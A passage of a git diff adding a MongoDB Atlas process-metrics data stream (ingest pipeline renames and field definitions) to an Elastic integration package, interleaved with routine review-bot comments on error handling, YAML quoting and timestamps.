0 : v[0])) + )}).drop(["measurements", "links"])), + "hostlist": (int(state.next)+1) < size(state.hostlist) ? state.hostlist : [], + "next": (int(state.next)+1) < size(state.hostlist) ? (int(state.next)+1) : 0, + "want_more": (int(state.next)+1) < size(state.hostlist) || state.page_num != 1, + "page_num": state.page_num, + "group_id": state.group_id, + "query": state.query, + }) + ) diff --git a/packages/mongodb_atlas/data_stream/process/elasticsearch/ingest_pipeline/default.yml b/packages/mongodb_atlas/data_stream/process/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..44a4506967e --- /dev/null +++ b/packages/mongodb_atlas/data_stream/process/elasticsearch/ingest_pipeline/default.yml 
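Review bot: Neither request in the program checks `resp.StatusCode` before `bytes(resp.Body).decode_json()`, so a 401/403/429 or 5xx body from the processes listing is parsed into `hostlist` (and the per-host measurements body into an event) as if it were a result, and the failure is invisible until the ingest pipeline sees a document with no measurements. A guard on each `do_request()` result along the lines of `resp.StatusCode == 200 ? <existing mapping> : {"events": {"error": {"code": string(resp.StatusCode), "message": string(resp.Body)}}, "want_more": false}` would surface the failure through the pipeline's existing `error.message` / `pipeline_error` path instead. Separately, `auth.digest` user/password and `resource.url` are rendered as unquoted scalars, so a `private_key` containing characters such as `#` or `: ` would break the generated YAML; rendering them quoted avoids that. The `Accept` header builds the API version from `now.getFullYear()`, which changes every January and may name a version the API has not published yet; pinning a known version date is more predictable.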
@@ -0,0 +1,582 @@ +--- +description: Pipeline for processing MongoDB Atlas process metrics. +processors: + - set: + field: ecs.version + value: 8.11.0 + - set: + field: event.kind + value: event + - set: + field: event.module + value: mongodb_atlas + - set: + field: event.category + value: ["process"] + - set: + field: event.type + value: ["info"] + - rename: + field: response.ASSERT_MSG + target_field: mongodb_atlas.process.assert.msg + ignore_missing: true + - rename: + field: response.ASSERT_REGULAR + target_field: mongodb_atlas.process.assert.regular + ignore_missing: true + - rename: + field: response.ASSERT_USER + target_field: mongodb_atlas.process.assert.user + ignore_missing: true + - rename: + field: response.ASSERT_WARNING + target_field: mongodb_atlas.process.assert.warning + ignore_missing: true + - rename: + field: response.BACKGROUND_FLUSH_AVG + target_field: mongodb_atlas.process.background_flush.avg + ignore_missing: true + - rename: + field: response.CACHE_DIRTY_BYTES + target_field: mongodb_atlas.process.cache.dirty.bytes + ignore_missing: true + - rename: + field: response.CACHE_BYTES_READ_INTO + target_field: mongodb_atlas.process.cache.read.bytes + ignore_missing: true + - rename: + field: response.CACHE_USED_BYTES + target_field: mongodb_atlas.process.cache.used.total.bytes + ignore_missing: true + - rename: + field: response.CACHE_BYTES_WRITTEN_FROM + target_field: mongodb_atlas.process.cache.write.bytes + ignore_missing: true + - rename: + field: response.CONNECTIONS + target_field: mongodb_atlas.process.connections + ignore_missing: true + - rename: + field: response.MAX_PROCESS_NORMALIZED_CPU_CHILDREN_KERNEL + target_field: mongodb_atlas.process.cpu.normalized.children.kernel.max.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_CPU_CHILDREN_KERNEL + target_field: mongodb_atlas.process.cpu.children.kernel.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_CPU_CHILDREN_KERNEL + target_field: 
mongodb_atlas.process.cpu.children.kernel.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_CPU_CHILDREN_USER + target_field: mongodb_atlas.process.cpu.children.user.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_CPU_CHILDREN_USER + target_field: mongodb_atlas.process.cpu.children.user.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_CPU_KERNEL + target_field: mongodb_atlas.process.cpu.kernel.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_CPU_KERNEL + target_field: mongodb_atlas.process.cpu.kernel.pct + ignore_missing: true + - rename: + field: response.PROCESS_NORMALIZED_CPU_CHILDREN_KERNEL + target_field: mongodb_atlas.process.cpu.normalized.children.kernel.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_NORMALIZED_CPU_CHILDREN_USER + target_field: mongodb_atlas.process.cpu.normalized.children.user.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_NORMALIZED_CPU_CHILDREN_USER + target_field: mongodb_atlas.process.cpu.normalized.children.user.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_NORMALIZED_CPU_KERNEL + target_field: mongodb_atlas.process.cpu.normalized.kernel.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_NORMALIZED_CPU_KERNEL + target_field: mongodb_atlas.process.cpu.normalized.kernel.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_NORMALIZED_CPU_USER + target_field: mongodb_atlas.process.cpu.normalized.user.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_NORMALIZED_CPU_USER + target_field: mongodb_atlas.process.cpu.normalized.user.pct + ignore_missing: true + - rename: + field: response.MAX_PROCESS_CPU_USER + target_field: mongodb_atlas.process.cpu.user.max.pct + ignore_missing: true + - rename: + field: response.PROCESS_CPU_USER + target_field: mongodb_atlas.process.cpu.user.pct + ignore_missing: true + - rename: + field: 
response.CURSORS_TOTAL_OPEN + target_field: mongodb_atlas.process.cursor.open.total + ignore_missing: true + - rename: + field: response.CURSORS_TOTAL_TIMED_OUT + target_field: mongodb_atlas.process.cursor.timed_out.total + ignore_missing: true + - rename: + field: response.DB_DATA_SIZE_TOTAL + target_field: mongodb_atlas.process.database.size.total.bytes + ignore_missing: true + - rename: + field: response.DB_STORAGE_TOTAL + target_field: mongodb_atlas.process.database.storage.total.bytes + ignore_missing: true + - rename: + field: response.DOCUMENT_METRICS_DELETED + target_field: mongodb_atlas.process.document.deleted + ignore_missing: true + - rename: + field: response.DOCUMENT_METRICS_INSERTED + target_field: mongodb_atlas.process.document.inserted + ignore_missing: true + - rename: + field: response.DOCUMENT_METRICS_RETURNED + target_field: mongodb_atlas.process.document.returned + ignore_missing: true + - rename: + field: response.DOCUMENT_METRICS_UPDATED + target_field: mongodb_atlas.process.document.updated + ignore_missing: true + - rename: + field: response.FTS_PROCESS_CPU_KERNEL + target_field: mongodb_atlas.process.fts.cpu.kernel.pct + ignore_missing: true + - rename: + field: response.FTS_PROCESS_NORMALIZED_CPU_KERNEL + target_field: mongodb_atlas.process.fts.cpu.normalized.kernel.pct + ignore_missing: true + - rename: + field: response.FTS_PROCESS_NORMALIZED_CPU_USER + target_field: mongodb_atlas.process.fts.cpu.normalized.user.pct + ignore_missing: true + - rename: + field: response.FTS_PROCESS_CPU_USER + target_field: mongodb_atlas.process.fts.cpu.user.pct + ignore_missing: true + - rename: + field: response.FTS_DISK_UTILIZATION + target_field: mongodb_atlas.process.fts.disk.utilization.total.bytes + ignore_missing: true + - rename: + field: response.FTS_MEMORY_MAPPED + target_field: mongodb_atlas.process.fts.memory.mapped.total.bytes + ignore_missing: true + - rename: + field: response.FTS_MEMORY_RESIDENT + target_field: 
mongodb_atlas.process.fts.memory.resident.total.bytes + ignore_missing: true + - rename: + field: response.FTS_MEMORY_VIRTUAL + target_field: mongodb_atlas.process.fts.memory.virtual.total.bytes + ignore_missing: true + - rename: + field: response.GLOBAL_ACCESSES_NOT_IN_MEMORY + target_field: mongodb_atlas.process.global.access.not_in_memory + ignore_missing: true + - rename: + field: response.GLOBAL_LOCK_CURRENT_QUEUE_READERS + target_field: mongodb_atlas.process.global.lock.current_queue.reader.count + ignore_missing: true + - rename: + field: response.GLOBAL_LOCK_CURRENT_QUEUE_TOTAL + target_field: mongodb_atlas.process.global.lock.current_queue.total + ignore_missing: true + - rename: + field: response.GLOBAL_LOCK_CURRENT_QUEUE_WRITERS + target_field: mongodb_atlas.process.global.lock.current_queue.writer.count + ignore_missing: true + - rename: + field: response.GLOBAL_PAGE_FAULT_EXCEPTIONS_THROWN + target_field: mongodb_atlas.process.global.page_fault.exception_thrown + ignore_missing: true + - rename: + field: response.EXTRA_INFO_PAGE_FAULTS + target_field: mongodb_atlas.process.host.page_faults + ignore_missing: true + - rename: + field: response.INDEX_COUNTERS_BTREE_ACCESSES + target_field: mongodb_atlas.process.index.btree.access.count + ignore_missing: true + - rename: + field: response.INDEX_COUNTERS_BTREE_HITS + target_field: mongodb_atlas.process.index.btree.hits.count + ignore_missing: true + - rename: + field: response.INDEX_COUNTERS_BTREE_MISS_RATIO + target_field: mongodb_atlas.process.index.btree.miss_ratio.count + ignore_missing: true + - rename: + field: response.INDEX_COUNTERS_BTREE_MISSES + target_field: mongodb_atlas.process.index.btree.miss.count + ignore_missing: true + - rename: + field: response.JOURNALING_COMMITS_IN_WRITE_LOCK + target_field: mongodb_atlas.process.journaling.commits.write_lock + ignore_missing: true + - rename: + field: response.JOURNALING_MB + target_field: mongodb_atlas.process.journaling.mb + ignore_missing: true + - 
rename: + field: response.JOURNALING_WRITE_DATA_FILES_MB + target_field: mongodb_atlas.process.journaling.write.data_files.mb + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_USER + target_field: mongodb_atlas.process.system.normalized.cpu.user.max.pct + ignore_missing: true + - rename: + field: response.COMPUTED_MEMORY + target_field: mongodb_atlas.process.memory.computed.mb + ignore_missing: true + - rename: + field: response.MEMORY_MAPPED + target_field: mongodb_atlas.process.memory.mapped.mb + ignore_missing: true + - rename: + field: response.MEMORY_RESIDENT + target_field: mongodb_atlas.process.memory.resident.mb + ignore_missing: true + - rename: + field: response.MEMORY_VIRTUAL + target_field: mongodb_atlas.process.memory.virtual.mb + ignore_missing: true + - rename: + field: response.NETWORK_BYTES_IN + target_field: mongodb_atlas.process.network.in + ignore_missing: true + - rename: + field: response.NETWORK_BYTES_OUT + target_field: mongodb_atlas.process.network.out + ignore_missing: true + - rename: + field: response.NETWORK_NUM_REQUESTS + target_field: mongodb_atlas.process.network.request.total + ignore_missing: true + - rename: + field: response.OPCOUNTER_CMD + target_field: mongodb_atlas.process.opcounter.cmd + ignore_missing: true + - rename: + field: response.OPCOUNTER_DELETE + target_field: mongodb_atlas.process.opcounter.delete + ignore_missing: true + - rename: + field: response.OPCOUNTER_GETMORE + target_field: mongodb_atlas.process.opcounter.getmore + ignore_missing: true + - rename: + field: response.OPCOUNTER_INSERT + target_field: mongodb_atlas.process.opcounter.insert + ignore_missing: true + - rename: + field: response.OPCOUNTER_QUERY + target_field: mongodb_atlas.process.opcounter.query + ignore_missing: true + - rename: + field: response.OPCOUNTER_REPL_CMD + target_field: mongodb_atlas.process.opcounter.repl.cmd + ignore_missing: true + - rename: + field: response.OPCOUNTER_REPL_DELETE + target_field: 
mongodb_atlas.process.opcounter.repl.delete + ignore_missing: true + - rename: + field: response.OPCOUNTER_REPL_INSERT + target_field: mongodb_atlas.process.opcounter.repl.insert + ignore_missing: true + - rename: + field: response.OPCOUNTER_REPL_UPDATE + target_field: mongodb_atlas.process.opcounter.repl.update + ignore_missing: true + - rename: + field: response.OPCOUNTER_UPDATE + target_field: mongodb_atlas.process.opcounter.update + ignore_missing: true + - rename: + field: response.OP_EXECUTION_TIME_COMMANDS + target_field: mongodb_atlas.process.operation.execution.time.cmd.avg.ms + ignore_missing: true + - rename: + field: response.OP_EXECUTION_TIME_READS + target_field: mongodb_atlas.process.operation.execution.time.read.avg.ms + ignore_missing: true + - rename: + field: response.OP_EXECUTION_TIME_WRITES + target_field: mongodb_atlas.process.operation.execution.time.write.avg.ms + ignore_missing: true + - rename: + field: response.OPERATIONS_SCAN_AND_ORDER + target_field: mongodb_atlas.process.operation.scan_and_order + ignore_missing: true + - rename: + field: response.OPLOG_MASTER_LAG_TIME_DIFF + target_field: mongodb_atlas.process.oplog.master.lag.time_diff.s + ignore_missing: true + - rename: + field: response.OPLOG_MASTER_TIME + target_field: mongodb_atlas.process.oplog.master.time.s + ignore_missing: true + - rename: + field: response.OPLOG_RATE_GB_PER_HOUR + target_field: mongodb_atlas.process.oplog.rate.gb_per_hour + ignore_missing: true + - rename: + field: response.OPLOG_REPLICATION_LAG + target_field: mongodb_atlas.process.oplog.repl_lag.s + ignore_missing: true + - rename: + field: response.OPLOG_SLAVE_LAG_MASTER_TIME + target_field: mongodb_atlas.process.oplog.slave.lag.master.time.s + ignore_missing: true + - rename: + field: response.QUERY_EXECUTOR_SCANNED + target_field: mongodb_atlas.process.query.executor.scanned + ignore_missing: true + - rename: + field: response.QUERY_EXECUTOR_SCANNED_OBJECTS + target_field: 
mongodb_atlas.process.query.executor.scanned_objects + ignore_missing: true + - rename: + field: response.QUERY_TARGETING_SCANNED_OBJECTS_PER_RETURNED + target_field: mongodb_atlas.process.query.targeting.scanned_objects_per_returned + ignore_missing: true + - rename: + field: response.QUERY_TARGETING_SCANNED_PER_RETURNED + target_field: mongodb_atlas.process.query.targeting.scanned_per_returned + ignore_missing: true + - rename: + field: response.RESTARTS_IN_LAST_HOUR + target_field: mongodb_atlas.process.restart.in_last_hour + ignore_missing: true + - rename: + field: response.MAX_SWAP_USAGE_FREE + target_field: mongodb_atlas.process.swap.usage.free.max.kb + ignore_missing: true + - rename: + field: response.SWAP_USAGE_FREE + target_field: mongodb_atlas.process.swap.usage.total.free + ignore_missing: true + - rename: + field: response.SWAP_USAGE_USED + target_field: mongodb_atlas.process.swap.usage.total.used + ignore_missing: true + - rename: + field: response.MAX_SWAP_USAGE_USED + target_field: mongodb_atlas.process.swap.usage.used.max.kb + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_GUEST + target_field: mongodb_atlas.process.system.cpu.guest.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_GUEST + target_field: mongodb_atlas.process.system.cpu.guest.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_IOWAIT + target_field: mongodb_atlas.process.system.cpu.iowait.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_IOWAIT + target_field: mongodb_atlas.process.system.cpu.iowait.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_IRQ + target_field: mongodb_atlas.process.system.cpu.irq.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_IRQ + target_field: mongodb_atlas.process.system.cpu.irq.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_KERNEL + target_field: mongodb_atlas.process.system.cpu.kernel.max.pct + 
ignore_missing: true + - rename: + field: response.SYSTEM_CPU_KERNEL + target_field: mongodb_atlas.process.system.cpu.kernel.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_NICE + target_field: mongodb_atlas.process.system.cpu.nice.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_SOFTIRQ + target_field: mongodb_atlas.process.system.cpu.softirq.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_SOFTIRQ + target_field: mongodb_atlas.process.system.cpu.softirq.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_STEAL + target_field: mongodb_atlas.process.system.cpu.steal.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_STEAL + target_field: mongodb_atlas.process.system.cpu.steal.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_CPU_USER + target_field: mongodb_atlas.process.system.cpu.user.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_CPU_USER + target_field: mongodb_atlas.process.system.cpu.user.pct + ignore_missing: true + - rename: + field: response.SYSTEM_MEMORY_AVAILABLE + target_field: mongodb_atlas.process.system.memory.available.kb + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_MEMORY_AVAILABLE + target_field: mongodb_atlas.process.system.memory.available.max.kb + ignore_missing: true + - rename: + field: response.SYSTEM_MEMORY_FREE + target_field: mongodb_atlas.process.system.memory.free.kb + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_MEMORY_FREE + target_field: mongodb_atlas.process.system.memory.free.max.kb + ignore_missing: true + - rename: + field: response.SYSTEM_MEMORY_USED + target_field: mongodb_atlas.process.system.memory.used.kb + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_MEMORY_USED + target_field: mongodb_atlas.process.system.memory.used.max.kb + ignore_missing: true + - rename: + field: response.SYSTEM_NETWORK_IN + target_field: 
mongodb_atlas.process.system.network.in + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NETWORK_IN + target_field: mongodb_atlas.process.system.network.max.in + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NETWORK_OUT + target_field: mongodb_atlas.process.system.network.max.out + ignore_missing: true + - rename: + field: response.SYSTEM_NETWORK_OUT + target_field: mongodb_atlas.process.system.network.out + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_GUEST + target_field: mongodb_atlas.process.system.normalized.cpu.guest.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_GUEST + target_field: mongodb_atlas.process.system.normalized.cpu.guest.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_IOWAIT + target_field: mongodb_atlas.process.system.normalized.cpu.iowait.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_IOWAIT + target_field: mongodb_atlas.process.system.normalized.cpu.iowait.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_IRQ + target_field: mongodb_atlas.process.system.normalized.cpu.irq.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_IRQ + target_field: mongodb_atlas.process.system.normalized.cpu.irq.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_KERNEL + target_field: mongodb_atlas.process.system.normalized.cpu.kernel.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_KERNEL + target_field: mongodb_atlas.process.system.normalized.cpu.kernel.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_NICE + target_field: mongodb_atlas.process.system.normalized.cpu.nice.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_NICE + target_field: mongodb_atlas.process.system.normalized.cpu.nice.pct + 
ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_SOFTIRQ + target_field: mongodb_atlas.process.system.normalized.cpu.softirq.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_SOFTIRQ + target_field: mongodb_atlas.process.system.normalized.cpu.softirq.pct + ignore_missing: true + - rename: + field: response.MAX_SYSTEM_NORMALIZED_CPU_STEAL + target_field: mongodb_atlas.process.system.normalized.cpu.steal.max.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_STEAL + target_field: mongodb_atlas.process.system.normalized.cpu.steal.pct + ignore_missing: true + - rename: + field: response.SYSTEM_NORMALIZED_CPU_USER + target_field: mongodb_atlas.process.system.normalized.cpu.user.pct + ignore_missing: true + - rename: + field: response.TICKETS_AVAILABLE_READS + target_field: mongodb_atlas.process.ticket.available.read.count + ignore_missing: true + - rename: + field: response.TICKETS_AVAILABLE_WRITE + target_field: mongodb_atlas.process.ticket.available.write.count + ignore_missing: true + - rename: + field: groupId + target_field: mongodb_atlas.group_id + ignore_missing: true + - rename: + field: processId + target_field: mongodb_atlas.process_id + ignore_missing: true + - rename: + field: hostId + target_field: mongodb_atlas.host_id + ignore_missing: true + - remove: + field: + - response + - start + - granularity + - end + - databaseName + ignore_missing: true + - set: + field: event.kind + value: pipeline_error + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false \ No newline at end of file diff --git a/packages/mongodb_atlas/data_stream/process/fields/base-fields.yml b/packages/mongodb_atlas/data_stream/process/fields/base-fields.yml new file mode 100644 index 00000000000..71df896d68c --- /dev/null 
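Review bot: The final `remove` processor drops `start`, `end` and `granularity` without first copying any of them into `@timestamp`, `event.start` or `event.end`, so every event is stamped with its ingest time rather than the measurement window it describes (assuming, as the field names suggest, that `start`/`end` bound the sampled period; worth confirming against the API response). A `date` processor on `end` targeting `@timestamp` with `formats: [ISO8601]` and `if: ctx.end != null`, placed before the `remove`, would preserve the measurement time, and `start`/`end` could be renamed to `event.start`/`event.end` instead of being discarded. The same `remove` also deletes the whole `response` object after the renames, so any measurement name not in the rename list is silently lost; a one-line comment stating that this is intentional, `# Unmapped measurements are dropped here on purpose; add a rename above to keep a new one.`, would save the next maintainer from guessing.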
+++ b/packages/mongodb_atlas/data_stream/process/fields/base-fields.yml
@@ -0,0 +1,15 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: input.type
+ type: keyword
+ description: Type of Filebeat input.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/mongodb_atlas/data_stream/process/fields/fields.yml b/packages/mongodb_atlas/data_stream/process/fields/fields.yml
new file mode 100644
index 00000000000..fdf161e93a6
--- /dev/null
+++ b/packages/mongodb_atlas/data_stream/process/fields/fields.yml
@@ -0,0 +1,835 @@ +- name: mongodb_atlas + type: group + fields: + - name: group_id + description: Identifier for the project of the event. + type: keyword + - name: host_id + description: Unique identifier of the host for the MongoDB process. + type: keyword + - name: process + type: group + fields: + - name: assert + type: group + fields: + - name: msg + description: The average rate of message asserts per second over the selected sample period. + type: double + metric_type: gauge + - name: regular + description: The average rate of regular asserts raised per second over the selected sample period. + type: double + metric_type: gauge + - name: user + description: The average rate of user asserts per second over the selected sample period. + type: double + metric_type: gauge + - name: warning + description: The average rate of warnings per second over the selected sample period. + type: double + metric_type: gauge + - name: background_flush.avg + description: Amount of data flushed in the background. + type: double + metric_type: gauge + - name: cache + type: group + fields: + - name: dirty.bytes + description: "Write - Amount of bytes in the WiredTiger storage engine cache." + type: double + metric_type: gauge + unit: byte + - name: read.bytes + description: "Read - Amount of bytes in the WiredTiger storage engine cache." + type: double + metric_type: gauge + unit: byte + - name: used.total.bytes + description: The total bytes cached in memory for serving reads and writes. + type: double + metric_type: gauge + unit: byte + - name: write.bytes + description: The maximum disk read latency value over the period specified by the metric granularity. + type: double + metric_type: gauge + unit: byte + - name: connections + description: Displays the total number of active connections to the database deployment. Monitor connections to determine whether the current connection limits are sufficient. 
+ type: double + metric_type: gauge + - name: cpu + type: group + fields: + - name: children + type: group + fields: + - name: kernel + type: group + fields: + - name: max.pct + description: The maximum amount of CPU time spent by child processes in kernel space. + type: double + metric_type: counter + unit: percent + - name: pct + description: CPU children kernel space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: The maximum amount of CPU time spent by child processes in user space. + type: double + metric_type: counter + unit: percent + - name: pct + description: CPU children user space for mongodb. + type: double + metric_type: gauge + unit: percent + - name: kernel + type: group + fields: + - name: max.pct + description: The maximum amount of CPU time spent by the MongoDB process itself in kernel space, handling system calls and hardware interrupts. + type: double + metric_type: counter + unit: percent + - name: pct + description: CPU kernel space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: normalized + type: group + fields: + - name: children + type: group + fields: + - name: kernel + type: group + fields: + - name: max.pct + description: Max children kernel CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED CPU children kernel space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: Max children user CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED CPU children user space for mongodb. 
+ type: double + metric_type: gauge + unit: percent + - name: kernel + type: group + fields: + - name: max.pct + description: Max kernel CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED CPU kernel space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: Max user CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED CPU user space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: The maximum amount of CPU time spent by the MongoDB process itself in user space, executing application code and processing data. + type: double + metric_type: counter + unit: percent + - name: pct + description: CPU user space for mongodb processes. + type: double + metric_type: gauge + unit: percent + - name: cursor + type: group + fields: + - name: open.total + description: The number of cursors that the server maintains for clients. + type: long + metric_type: gauge + - name: timed_out.total + description: The average rate of cursors that have timed out per second over the selected sample period. + type: double + metric_type: gauge + - name: database + type: group + fields: + - name: size.total.bytes + description: The amount of storage space in bytes that your stored data uses. + type: long + metric_type: gauge + unit: byte + - name: storage.total.bytes + description: Sum total of the compressed on-disk storage space allocated for document storage across all databases. 
+ type: long + metric_type: gauge + unit: byte + - name: document + type: group + fields: + - name: deleted + description: Displays the documents deleted per second. + type: double + metric_type: gauge + - name: inserted + description: Displays the documents inserted per second. + type: double + metric_type: gauge + - name: returned + description: Displays the documents returned per second. + type: double + metric_type: gauge + - name: updated + description: Displays the documents updated per second. + type: double + metric_type: gauge + - name: fts + type: group + fields: + - name: cpu + type: group + fields: + - name: kernel.pct + description: The amount of CPU time spent by the Full-Text search process in kernel space. + type: double + metric_type: gauge + unit: percent + - name: normalized + type: group + fields: + - name: kernel.pct + description: Percentage of time that the CPU spent servicing the operating system calls for the search process. + type: double + metric_type: gauge + unit: percent + - name: user.pct + description: Percentage of time that the CPU spent servicing user calls for the search process. + type: double + metric_type: gauge + unit: percent + - name: user.pct + description: The amount of CPU time spent by the Full-Text search process in user space. + type: double + metric_type: gauge + unit: percent + - name: disk + type: group + fields: + - name: utilization.total.bytes + description: Total bytes of disk space that search processes use. + type: long + metric_type: gauge + unit: byte + - name: memory + type: group + fields: + - name: mapped.total.bytes + description: Total bytes of mapped memory that search processes occupy. + type: long + metric_type: gauge + unit: byte + - name: resident.total.bytes + description: Total bytes of resident memory that search processes occupy. + type: long + metric_type: gauge + unit: byte + - name: virtual.total.bytes + description: Total bytes of virtual memory that search processes occupy. 
+ type: long + metric_type: gauge + unit: byte + - name: global + type: group + fields: + - name: access.not_in_memory + description: The number of accesses to data that are not currently stored in memory, requiring disk access. + type: long + metric_type: gauge + - name: lock + type: group + fields: + - name: current_queue + type: group + fields: + - name: reader.count + description: The number of operations that are currently queued and waiting for the read lock. + type: long + metric_type: gauge + - name: total + description: The total number of operations queued waiting for the lock (readers + writers) + type: long + metric_type: gauge + - name: writer.count + description: The number of operations that are currently queued and waiting for the write lock. + type: long + metric_type: gauge + - name: page_fault.exception_thrown + description: The number of exceptions thrown due to page faults. + type: long + metric_type: gauge + - name: host + type: group + fields: + - name: page_faults + description: Measurements on page faults related to the host. + type: double + metric_type: gauge + - name: index + type: group + fields: + - name: btree + type: group + fields: + - name: access.count + description: Number of index btree ACCESSES. + type: long + metric_type: gauge + - name: hits.count + description: Number of index btree HITS. + type: long + metric_type: gauge + - name: miss_ratio.count + description: Index btree miss ratio. + type: double + metric_type: gauge + - name: miss.count + description: Number of index btree MISSES. + type: long + metric_type: gauge + - name: journaling + type: group + fields: + - name: commits.write_lock + description: Number of journaling COMMIT operations. + type: long + metric_type: gauge + - name: mb + description: Average amount of data in megabytes Cloud Manager writes to the recovery log per second meets your specified threshold. 
+ type: double + metric_type: gauge + - name: write.data_files.mb + description: The maximum size in megabytes (MB) of data files written by the journaling process. + type: double + metric_type: gauge + - name: memory + type: group + fields: + - name: computed.mb + description: Amount of COMPUTED process memory in megabytes. + type: double + metric_type: gauge + - name: mapped.mb + description: Amount of MAPPED process memory in megabytes. + type: double + metric_type: gauge + - name: resident.mb + description: Amount of RESIDENT process memory in megabytes. + type: double + metric_type: gauge + - name: virtual.mb + description: Amount of VIRTUAL process memory in megabytes. + type: double + metric_type: gauge + - name: network + type: group + fields: + - name: in + description: Process incoming network throughput in bytes per second. + type: double + metric_type: gauge + - name: out + description: Process outgoing network throughput in bytes per second. + type: double + metric_type: gauge + - name: request.total + description: The total number of distinct requests that the process has received. + type: double + metric_type: counter + - name: opcounter + type: group + fields: + - name: cmd + description: Database operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: delete + description: Database DELETE operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: getmore + description: Database GETMORE operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: insert + description: Database INSERT operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: query + description: Database QUERY operations rate on a process since the process last started. 
+ type: double + metric_type: gauge + - name: repl + type: group + fields: + - name: cmd + description: Database operations rate on secondaries. + type: double + metric_type: gauge + - name: delete + description: Database DELETE operations rate on secondaries. + type: double + metric_type: gauge + - name: insert + description: Database INSERT operations rate on secondaries. + type: double + metric_type: gauge + - name: update + description: Database UPDATE operations rate on secondaries. + type: double + metric_type: gauge + - name: update + description: Database UPDATE operations rate on a process since the process last started. + type: double + metric_type: gauge + - name: operation + type: group + fields: + - name: execution.time + type: group + fields: + - name: cmd.avg.ms + description: Average execution time in milliseconds per command operation over the selected sample period. + type: double + metric_type: gauge + unit: ms + - name: read.avg.ms + description: Average execution time in milliseconds per read operation over the selected sample period. + type: double + metric_type: gauge + unit: ms + - name: write.avg.ms + description: Average execution time in milliseconds per write operation over the selected sample period. + type: double + metric_type: gauge + unit: ms + - name: scan_and_order + description: The total number of queries that return sorted data that cannot perform the sort operation using an index. + type: double + metric_type: gauge + - name: oplog + type: group + fields: + - name: master + type: group + fields: + - name: lag.time_diff.s + description: Lag or delay in replication between the primary node (oplog master) and its secondary nodes. + type: double + unit: s + metric_type: gauge + - name: time.s + description: The replication oplog window. The approximate time available in the primary's replication oplog. If a secondary is behind real-time by more than this amount, it cannot catch up and will require a full resync. 
